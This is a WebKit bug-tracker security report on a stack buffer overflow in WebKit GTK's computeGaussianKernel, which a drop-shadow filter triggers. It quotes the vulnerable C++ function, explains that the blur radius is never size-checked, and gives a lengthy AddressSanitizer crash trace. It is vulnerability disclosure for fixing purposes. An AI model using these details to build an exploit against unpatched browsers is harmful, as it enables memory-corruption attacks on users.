Bug 265659

Summary: [TextureMapper][GTK] WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability for drop-shadow filter
Product: Security
Reporter: Park Sangwoo <pswpsw0177>
Component: Security
Assignee: Jonathan Bedard <jbedard>
Status: RESOLVED FIXED
Severity: Normal
CC: bfulgham, cgarcia, don.olmstead, fujii, magomez, mcatanzaro, webkit-bug-importer
Priority: P3
Keywords: Gtk, InRadar
Version: WebKit Local Build
Hardware: PC
OS: Linux
Attachments (description, flags):
- PoC file: none
- WIP patch: none
- test case 2: none
- Patch: none

Park Sangwoo
Reported 2023-12-01 05:29:27 PST
Created attachment 468832 [details] PoC file 1. Vulnerability Title a. WebKit GTK computeGaussianKernel Stack Buffer Overflow Vulnerability 2. High-level overview of the vulnerability and the possible effect of using it 1. The Stack Buffer Overflow Vulnerability exists in WebKit GTK computeGaussianKernel function. 2. An Attacker must open a arbitrary generated HTML file to exploit this vulnerability. 3. Exact product that was found to be vulnerable including complete version information 1. Ubuntu 22.04.3 LTS 4. Root Cause Analysis (recommended but not required) 1. The vulnerability exists when referring to a stack memory area in the function `computeGaussianKernel` . 2. Refer to the `radius` in the function `computeGaussianKernel`. This causes Stack Buffer Overflow. 3. The lack of size validation for radius leads to a stack buffer overflow. ```cpp static unsigned blurRadiusToKernelHalfSize(float radius) { return ceilf(radius * 2 + 1); } static int computeGaussianKernel(float radius, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& kernel, std::array<float, SimplifiedGaussianKernelMaxHalfSize>& offset) { unsigned kernelHalfSize = blurRadiusToKernelHalfSize(radius); ASSERT(kernelHalfSize <= GaussianKernelMaxHalfSize); float fullKernel[GaussianKernelMaxHalfSize]; fullKernel[0] = 1; float sum = fullKernel[0]; for (unsigned i = 1; i < kernelHalfSize; ++i) { fullKernel[i] = gauss(i, radius); //====> crash here sum += 2 * fullKernel[i]; } float scale = 1 / sum; for (unsigned i = 0; i < kernelHalfSize; ++i) fullKernel[i] *= scale; unsigned simplifiedKernelHalfSize = kernelHalfSizeToSimplifiedKernelHalfSize(kernelHalfSize); kernel[0] = fullKernel[0]; for (unsigned i = 1; i < simplifiedKernelHalfSize; i++) { unsigned offset1 = 2 * i - 1; unsigned offset2 = 2 * i; if (offset2 >= kernelHalfSize) { kernel[i] = fullKernel[offset1]; offset[i] = offset1; break; } kernel[i] = fullKernel[offset1] + fullKernel[offset2]; offset[i] = (fullKernel[offset1] * offset1 + 
fullKernel[offset2] * offset2) / kernel[i]; } return simplifiedKernelHalfSize; } ``` ```cpp ================================================================= ==237950==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f4bb2926dec at pc 0x7f4c093cc093 bp 0x7f4bb2926d90 sp 0x7f4bb2926d88 WRITE of size 4 at 0x7f4bb2926dec thread T9 (eadedCompositor) #0 0x7f4c093cc092 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23 #1 0x7f4c093cc092 in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:872:36 #2 0x7f4c093cf333 in WebCore::TextureMapperGL::applyDropShadowFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WebCore::DropShadowFilterOperation const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1058:13 #3 0x7f4c093d18f1 in WebCore::TextureMapperGL::applyFilter(WTF::RefPtr<WebCore::BitmapTexture, WTF::RawPtrTraits<WebCore::BitmapTexture>, WTF::DefaultRefDerefTraits<WebCore::BitmapTexture> >, WTF::RefPtr<WebCore::FilterOperation const, WTF::RawPtrTraits<WebCore::FilterOperation const>, WTF::DefaultRefDerefTraits<WebCore::FilterOperation const> > const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:1140:16 #4 0x7f4c093ba606 in WebCore::BitmapTextureGL::applyFilters(WebCore::TextureMapper&, WebCore::FilterOperations const&, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/BitmapTextureGL.cpp:180:28 #5 0x7f4c093aef34 in 
WebCore::TextureMapperLayer::paintIntoSurface(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:680:40 #6 0x7f4c093ae29f in WebCore::TextureMapperLayer::paintSelfAndChildrenWithIntermediateSurface(WebCore::TextureMapperPaintOptions&, WebCore::IntRect const&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:719:9 #7 0x7f4c093ada93 in WebCore::TextureMapperLayer::paintSelfChildrenFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:653:17 #8 0x7f4c093ac7d2 in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:744:9 #9 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #10 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #11 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #12 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #13 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) 
/home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #14 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #15 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #16 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #17 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #18 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #19 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #20 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #21 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #22 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) 
/home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #23 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #24 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #25 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #26 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #27 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #28 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #29 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #30 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #31 0x7f4c093a8525 in 
WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #32 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #33 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #34 0x7f4c093a7b85 in WebCore::TextureMapperLayer::paintSelfAndChildren(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:295:16 #35 0x7f4c093a8525 in WebCore::TextureMapperLayer::paintSelfAndChildrenWithReplica(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:331:5 #36 0x7f4c093ac63a in WebCore::TextureMapperLayer::paintSelfChildrenReplicaFilterAndMask(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:746:9 #37 0x7f4c093a5d6a in WebCore::TextureMapperLayer::paintRecursive(WebCore::TextureMapperPaintOptions&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:761:9 #38 0x7f4c093a5810 in WebCore::TextureMapperLayer::paint(WebCore::TextureMapper&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperLayer.cpp:178:5 #39 0x7f4c0844ed7c in WebKit::CoordinatedGraphicsScene::paintToCurrentGLContext(WebCore::TransformationMatrix const&, WebCore::FloatRect const&, unsigned int) 
/home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/CoordinatedGraphicsScene.cpp:76:23 #40 0x7f4c0846e585 in WebKit::ThreadedCompositor::renderLayerTree() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:251:14 #41 0x7f4c08472c5f in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:68 #42 0x7f4c08472c5f in WTF::Detail::CallableWrapper<WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39 #43 0x7f4c0845b46f in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35 #44 0x7f4c0845b46f in WebKit::CompositingRunLoop::updateTimerFired() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:179:5 #45 0x7f4c0846af2b in void std::__invoke_impl<void, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(std::__invoke_memfun_deref, void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:74:14 #46 0x7f4c0846af2b in std::__invoke_result<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>::type std::__invoke<void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&>(void (WebKit::CompositingRunLoop::*&)(), WebKit::CompositingRunLoop*&) 
/usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14 #47 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::__call<void, 0ul>(std::tuple<>&&, std::_Index_tuple<0ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:420:11 #48 0x7f4c0846af2b in void std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>::operator()<void>() /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/functional:503:17 #49 0x7f4c0846af2b in WTF::Detail::CallableWrapper<std::_Bind<void (WebKit::CompositingRunLoop::* (WebKit::CompositingRunLoop*))()>, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39 #50 0x7f4c07f0b0b3 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:82:35 #51 0x7f4c07f0b0b3 in WTF::RunLoop::Timer::fired() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/RunLoop.h:195:33 #52 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:177:16 #53 0x7f4c04b07ed8 in WTF::RunLoop::TimerBase::TimerBase(WTF::RunLoop&)::$_3::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:169:43 #54 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28 #55 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5 #56 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b) #57 0x7f4bfcb76257 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0xab257) (BuildId: 
c74e800dfd5f72649d673b44292f4a817e45150b) #58 0x7f4bfcb202b2 in g_main_loop_run (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x552b2) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b) #59 0x7f4c04b069c8 in WTF::RunLoop::run() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:108:9 #60 0x7f4c0499e9c8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:114:9 #61 0x7f4c0499e9c8 in WTF::Detail::CallableWrapper<WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS)::$_1, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:53:39 #62 0x7f4c049a97ff in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35 #63 0x7f4c049a97ff in WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:250:5 #64 0x7f4c04b147a8 in WTF::wtfThreadEntryPoint(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:242:5 #65 0x7f4bfc494ac2 in start_thread nptl/./nptl/pthread_create.c:442:8 #66 0x7f4bfc526a3f misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:81 Address 0x7f4bb2926dec is located in stack of thread T9 (eadedCompositor) at offset 76 in frame #0 0x7f4c093cbcbf in WebCore::TextureMapperGL::drawBlurred(WebCore::BitmapTexture const&, WebCore::FloatRect const&, float, WebCore::TextureMapperGL::Direction, bool) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:856 This frame has 6 object(s): [32, 76) 'fullKernel.i' (line 354) <== Memory access at offset 76 overflows this variable [112, 120) 'program' (line 857) [144, 168) 'kernel' (line 870) [208, 232) 'offset' (line 871) [272, 400) 'textureBlurMatrix' (line 877) [432, 560) 'ref.tmp53' (line 895) HINT: this may be a false positive if your program uses some custom stack 
unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) Thread T9 (eadedCompositor) created by T0 here: #0 0x560a95b0a5dc in pthread_create (/home/fuzz/Downloads/webkitgtk-2.41.92/build/libexec/webkit2gtk-4.0/WebKitWebProcess+0x8a5dc) (BuildId: 993abfac4fe138f0c15349dccc801d74c501b984) #1 0x7f4c04b14593 in WTF::Thread::establishHandle(WTF::Thread::NewThreadContext*, std::optional<unsigned long>, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/posix/ThreadingPOSIX.cpp:292:17 #2 0x7f4c049a9e31 in WTF::Thread::create(char const*, WTF::Function<void ()>&&, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Threading.cpp:266:32 #3 0x7f4c0499c7d8 in WTF::RunLoop::create(char const*, WTF::ThreadType, WTF::Thread::QOS) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:111:5 #4 0x7f4c0845b0b9 in WebKit::CompositingRunLoop::CompositingRunLoop(WTF::Function<void ()>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/CompositingRunLoop.cpp:43:17 #5 0x7f4c0846b26d in std::_MakeUniq<WebKit::CompositingRunLoop>::__single_object std::make_unique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34 #6 0x7f4c0846b26d in decltype(auto) WTF::makeUnique<WebKit::CompositingRunLoop, WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned 
int)::$_0>(WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int)::$_0&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12 #7 0x7f4c0846b26d in WebKit::ThreadedCompositor::ThreadedCompositor(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:60:28 #8 0x7f4c0846aff4 in WebKit::ThreadedCompositor::create(WebKit::ThreadedCompositor::Client&, WebKit::ThreadedDisplayRefreshMonitor::Client&, unsigned int, WebCore::IntSize const&, float, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Shared/CoordinatedGraphics/threadedcompositor/ThreadedCompositor.cpp:54:26 #9 0x7f4c09262071 in WebKit::LayerTreeHost::LayerTreeHost(WebKit::WebPage&, unsigned int) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/LayerTreeHost.cpp:82:20 #10 0x7f4c0925b38d in std::_MakeUniq<WebKit::LayerTreeHost>::__single_object std::make_unique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/unique_ptr.h:962:34 #11 0x7f4c0925b38d in decltype(auto) WTF::makeUnique<WebKit::LayerTreeHost, WebKit::WebPage&, unsigned long>(WebKit::WebPage&, unsigned long&&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/StdLibExtras.h:596:12 #12 0x7f4c0925b38d in WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingMode(WebCore::GraphicsLayer*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:596:27 #13 0x7f4c0925afda in 
WebKit::DrawingAreaCoordinatedGraphics::enterAcceleratedCompositingModeIfNeeded() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/CoordinatedGraphics/DrawingAreaCoordinatedGraphics.cpp:293:5 #14 0x7f4c0916d290 in WebKit::WebPage::WebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:799:24 #15 0x7f4c0916831e in WebKit::WebPage::create(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebPage/WebPage.cpp:492:31 #16 0x7f4c08c9203c in WebKit::WebProcess::createWebPage(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:856:21 #17 0x7f4c07912bd1 in auto void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...)::operator()<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(auto&&...) 
const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:136:13 #18 0x7f4c07912bd1 in WebKit::WebProcess std::__invoke_impl<void, void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(std::__invoke_other, WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:61:14 #19 0x7f4c07912bd1 in std::__invoke_result<WebKit::WebProcess, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>::type std::__invoke<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void 
